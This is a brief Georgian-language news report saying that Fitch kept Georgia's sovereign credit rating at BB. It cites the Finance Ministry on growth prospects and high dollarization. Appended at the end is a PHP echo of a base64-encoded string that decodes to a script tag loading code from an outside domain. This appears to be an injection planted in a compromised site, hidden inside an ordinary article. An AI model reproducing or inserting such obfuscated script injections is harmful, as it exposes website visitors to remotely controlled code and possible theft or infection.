gorgia
jaluzi

საკრედიტო სააგენტო „ფიჩმა“ საქართველოს სუვერენული რეიტინგი შეაფასა და სხვადასხვა ფაქტორების გათვალისწინებით, რეიტინგი უცვლელად, BB დონეზე დატოვა. ინფორმაციას ამის შესახებ ფინანსთა სამინისტრო ავრცელებს.

როგორც უწყება წერს, დოკუმენტში აღნიშნულია, რომ საქართველოს გააჩნია მსგავსი შეფასების მქონე ქვეყნებთან შედარებით მაღალი ეკონომიკური განვითარება და საიმედო მაკრო-ფისკალური პოლიტიკის ჩარჩო.

„სტაბილურად არის შეფასებული, როგორც მთავრობის ვალის დონე, ასევე – საბანკო სექტორის საქმიანობა. ამასთან, ფიჩი ასევე, აღნიშნავს დოლარიზაციისა და უცხოურ ვალუტაში გამოსახული ვალის მაღალ დონეს.

„ფიჩი“ განმარტავს, რომ სხვადასხვა დარგში ინვესტიციების გამო გაზრდილია ქვეყნის პოტენციური ეკონომიკური ზრდა და 2025-2026 წლებში ელოდება 5%-ზე მაღალ ეკონომიკურ ზრდას. წინა შეფასების მსგავსად, ამ ანგარიშშიც აღნიშნულია საბიუჯეტო მაჩვენებლების მოსალოდნელზე უკეთესი შედეგები, რაც მაღალი საბიუჯეტო შემოსავლების მობილიზებით არის გამოწვეული“, – ნათქვამია ფინანსთა სამინისტროს გავრცელებულ ინფორმაციაში.

148
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");